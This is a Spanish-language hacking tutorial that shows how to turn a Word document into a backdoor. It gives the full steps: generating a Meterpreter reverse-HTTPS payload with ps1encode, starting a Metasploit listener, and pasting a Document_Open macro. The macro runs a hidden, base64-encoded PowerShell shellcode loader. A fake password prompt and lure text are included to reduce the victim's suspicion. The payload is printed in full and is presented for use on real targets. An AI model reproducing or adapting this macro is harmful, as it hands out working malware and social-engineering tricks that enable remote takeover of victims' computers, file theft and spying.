Cómo hackear windows con Word – La guía definitiva

Hackear windows con Word

Esta vez te hablaré de un tema muy interesante, te diré a detalle como hackear windows con Word, con esto podrás descargar, modificar los archivos del usuario, obtener acceso al micrófono, la webcam, escalar privilegios, grabar la pantalla, etc.

Para lograr realizar esta tarea recurriremos al uso de las macros de Word, si eres nuevo en este tema, te daré una breve explicación para que tengas una visión más amplia de cómo funciona esto.

Una macro es un conjunto de acciones o comandos que se pueden ejecutar las veces que el usuario lo desee para automatizar sus tareas o trabajos, Word incluye Microsoft Visual Basic para aplicaciones (VBA) para que podamos crear las macros, pero en este caso nosotros incrustaremos una carga útil que nos dará el acceso al ordenador del usuario que le enviaremos el documento de Word.

Puedes leer también este artículo en mi sitio web: elcursodelhacker

Información antes de hackear windows con Word

Haré mucho más interesante este artículo con unas cuantas líneas de código que se me ocurrió implementar en la macro para hacer menos sospechoso esta prueba de intrusión.

Word no es el único que incluye VBA, esto también lo encontraremos en Excel y PowerPoint, así que, si deseas realizar esto también con uno de estos documentos, te funcionará perfectamente.

Descargar e instalar PS1ENCODE para hackear Windows con Word

El primer paso que haremos es descargar una herramienta que nos permita crear la carga útil, el nombre del script que utilizaremos es ps1encode, la instalación es bastante rápida.

Instalación de ps1encode en linux:

$ git clone https://github.com/CroweCybersecurity/ps1encode

$ cd ps1encode

$ ./ps1encode.rb
ps1encode1 1

Clonamos el repositorio de github con git clone https://github.com/CroweCybersecurity/ps1encode, después cambiamos de directorio con el comando cd ps1encode, para ejecutar el script teclea lo siguiente ./ps1encode.rb

Perfecto, ahora veamos algunos parámetros, la herramienta ya incluye un ejemplo, los datos que tienes que tener a la mano es tu dirección IP, si quieres realizar el ataque fuera de la red local necesitas saber tu dirección IP pública y dejar un puerto abierto en tu modem o enrutador, en este ejemplo lo vamos a hacer dentro de la red local, para saber tu IP abre una nueva terminal e ingresa el siguiente comando ifconfig.

ps1encode2 1

Uso de PS1ENCODE

El objetivo a vulnerar es un sistema operativo Windows, utilizaremos un https reverso para recibir las conexiones, el puerto que elegiré es el 443, tu puedes escoger otro y recuerda que generaremos una carga útil para visual basic para aplicaciones (VBA), lo que te he comentado en la introducción.

./ps1encode.rb -i tudireccionip -p elpuerto -a windows/meterpreter/reverse_https -t vba
ps1encode3 1

Una vez tengamos generada la carga útil, copiaremos todo el código correspondiente, en este caso comenzaremos por stringA = “power” hasta Shell stringFinal, 0 el resto no te servirá de nada.

Llego el turno de Metasploit, tienes que ponerlo a la escucha para que pueda recibir la conexión del usuario objetivo, solo ingresa los parámetros correctos, te daré una referencia.

ps1encode6 1

Incrustar la carga útil en VBA de Word

Hasta el momento vamos muy bien, el siguiente paso para hackear Windows con Word es crear un nuevo documento de Word, puedes agregar algún texto que invite al usuario a habilitar las macros, por ejemplo: “HABILITA LAS MACROS PARA ACCEDER A LA INFORMACIÓN CONFIDENCIAL”.

Dirígete en la pestaña Desarrollador, si no lo encuentras, puedes agregarlo marcando la casilla Desarrollador, para esto da clic en Archivo en la parte superior izquierda, Opciones y Personalizar cinta de opciones, selecciona la casilla correspondiente; da clic en Visual Basic para continuar con el siguiente paso.

Ocultar backdoor en un documento de word 1

Presiona en ThisDocument, llego el momento de copiar la carga útil, pero antes de hacerlo tienes que unirlo con otra pequeña línea de código que he creado, te lo compartiré para que puedas copiarlo.

Private Sub Document_Open()

Entrada = InputBox("Ingrese la clave para acceder", "INFORMACIÓN CONFIDENCIAL")

If Entrada = "elcursodelhacker" Then
ActiveDocument.Content.Select
 Selection.Delete
 Dim rngFormat As Range
 Set rngFormat = ActiveDocument.Range(Start:=0, End:=0)
 With rngFormat
 .InsertAfter Text:="INFORMACIÓN CONFIDENCIAL"
 .InsertParagraphAfter
 With .Font
 .Name = "Tahoma"
 .Size = 24
 .Bold = True
 End With
 End With
 With ActiveDocument.Paragraphs(1)
 .Alignment = wdAlignParagraphCenter
 .SpaceAfter = InchesToPoints(0.5)
 End With
 ActiveDocument.Content.InsertAfter Text:="HACKEADO"
Else
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter Text:="LA CLAVE INTRODUCIDA ES INCORRECTA"
End If

End Sub

Todo el código que copiaste de ps1encode, lo pegaras antes de End Sub, te dejaré el ejemplo para que no comentas un error de sintaxis.

Private Sub Document_Open()

Entrada = InputBox("Ingrese la clave para acceder", "INFORMACIÓN CONFIDENCIAL")

If Entrada = "elcursodelhacker" Then
ActiveDocument.Content.Select
 Selection.Delete
 Dim rngFormat As Range
 Set rngFormat = ActiveDocument.Range(Start:=0, End:=0)
 With rngFormat
 .InsertAfter Text:="INFORMACIÓN CONFIDENCIAL"
 .InsertParagraphAfter
 With .Font
 .Name = "Tahoma"
 .Size = 24
 .Bold = True
 End With
 End With
 With ActiveDocument.Paragraphs(1)
 .Alignment = wdAlignParagraphCenter
 .SpaceAfter = InchesToPoints(0.5)
 End With
 ActiveDocument.Content.InsertAfter Text:="HACKEADO"
Else
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter Text:="LA CLAVE INTRODUCIDA ES INCORRECTA"
End If

stringA = "power"
stringB = "shell.exe -NoE -NoP -NonI -W Hidden -E "
            
string0 = "JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQPorAG4AIABJAG4AdABQAHQAcgAgAFYAaQPorAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAH"
string1 = "MAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj"
string2 = "ACAAZQB4AHQAZQPorAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAPorAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALA"
string3 = "AgAEkAbgB0AFAAdAPorACAAbABwAFAAYQPorAGEAbQBlAHQAZQPorACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAPorACAAbABwAFQAaAPorAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwPorAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMA"
string4 = "dABhAHQAaQBjACAAZQB4AHQAZQPorAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwPorAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQPorAEQAZQBmAGkAbgBpAHQAaQBvAG"
string5 = "4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAZgAsADAAeAAw"
string6 = "ADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAAzADEALAAwAHgAZg"
string7 = "BmACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAA"
string8 = "ZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADQAOQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4AD"
string9 = "UALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADQAOAAsADAAeAAxADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGMALAAwAHgAMwAx"
string10 = "ACwAMAB4AGYAZgAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANA"
string11 = "AsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIA"
string12 = "LAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxAC"
string13 = "wAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAOAAwACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAs"
string14 = "ADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALA"
string15 = "AwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwA"
string16 = "MAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgANQA5ACwAMAB4ADUANAAsADAAeAA1ADYALAAwAHgANQAxACwAMAB4ADcANwAsADAAeAA3ADgALAAwAHgAMwA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgAMwA2ACwAMAB4ADcAOQAsADAAeAA0ADYALAAwAHgANAAxACwAMAB4ADUAOQAsAD"
string17 = "AAeAA1ADEALAAwAHgANAAxACwAMAB4ADMANQAsADAAeAAzADAALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANgA3ACwAMAB4ADQAYwAsADAAeAA1ADAALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeAA2ADIALAAwAHgAMgBkACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAw"
string18 = "AHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMAMgAsADAAeABlADgALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMA"
string19 = "B4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAA"
string20 = "eAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAH"
string21 = "gAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4"
string22 = "AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeA"
string23 = "A2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgA"
string24 = "NgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4AD"
string25 = "AANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAz"
string26 = "ADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwA1ACwAMAB4ADMANgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADEALAAwAHgAMAAwADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJA"
string27 = "BzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsA"
string28 = "KwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAPorAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwPorACAAKAA7ADsAKQB7AF"
string29 = "MAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABl"
string30 = "AHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQ"
string31 = "PorAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAG8AbgBpACAALQBlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAG8A"
string32 = "dwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA=="

stringFinal = stringA + stringB + string0 + string1 + string2 + string3 + string4 + string5 + string6 + string7 + string8 + string9 + string10 + string11 + string12 + string13 + string14 + string15 + string16 + string17 + string18 + string19 + string20 + string21 + string22 + string23 + string24 + string25 + string26 + string27 + string28 + string29 + string30 + string31 + string32

    Shell stringFinal, 0

End Sub

Eso es todo, ahora solo copia todo ese código en el documento en blanco que tienes abierto, cuanto termines de hacer lo que te dije, ciérralo.

Ocultar backdoor en un documento de word 2

El último paso es guardar el archivo, la extensión que tienes que elegir debe permitir el uso de las macros, nosotros seleccionaremos Documento habilitado para macros .docm, puedes elegir como alternativa Documento de Word 97-2003 .doc.

Ocultar backdoor en un documento de word 3

Ejecución de la Macro para hackear Windows con Word

Observemos como se ve el archivo al momento de abrirlo, en la parte superior del texto aparecerá un botón “Habilitar contenido”, si el usuario le da clic, nosotros ya tendremos acceso remoto, esto lo puedes comprobar viendo tu terminal.

Ocultar backdoor en un documento de word 4

Para despistar sospechas le mostrará el resto de macros, le solicitará una clave para que pueda visualizar la información que contiene el documento, en este caso es “elcursodelhacker”.

Ocultar backdoor en un documento de word 5

Si la clave es correcta verá la información que nosotros le hemos indicado, tu puedes modificar el texto que verás a continuación, esto es solo un ejemplo.

hackear windows con word

En caso contrario, si la clave introducida es incorrecta le mostrará el siguiente texto en el documento.

Ocultar backdoor en un documento de word 7

Sesión obtenida para hackear windows con Metasploit Framework

En la siguiente captura de pantalla, puedes comprobar que efectivamente ya tenemos una sesión en línea, si dominas Metasploit, ya sabes que podemos hacer con el equipo comprometido.

Veamos qué sistema operativo es, tecleamos el siguiente comando sysinfo, se trata de un Windows 10; la explicación lo dejaremos hasta aquí, espero te haya sito útil.

Hackear windows con Metasploit Framework

Puedes leer también este artículo en mi sitio web: elcursodelhacker

Recomendar0 recomendaciones

Publicaciones relacionadas

0 Comentarios
Comentarios en línea
Ver todos los comentarios

¡Descubre los increíbles beneficios de esta valiosa comunidad!

Lector

Escritor

Anunciante